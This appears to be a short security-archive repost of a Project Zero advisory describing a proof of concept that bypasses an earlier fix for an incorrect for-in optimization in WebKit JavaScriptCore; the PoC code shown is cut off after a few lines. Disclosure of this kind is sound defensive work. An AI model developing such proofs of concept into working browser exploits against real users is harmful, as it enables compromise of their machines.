WebKit JSC Incorrect Optimization

A proof of concept has been released that bypasses the fix for the original finding regarding an incorrect optimization in BytecodeGenerator::emitGetByVal in WebKit JSC.

MD5 | c93b1f362e5c29a309a5639c5750833c

WebKit: JSC: Incorrect for-in optimization #2


The following PoC bypasses the fix for the https://bugs.chromium.org/p/project-zero/issues/detail?id=1263 WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal

function f() {
let o = {};
for (let i in {xx: 0}) {
for (i of [0]) {




This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Found by: lokihardt

Related Posts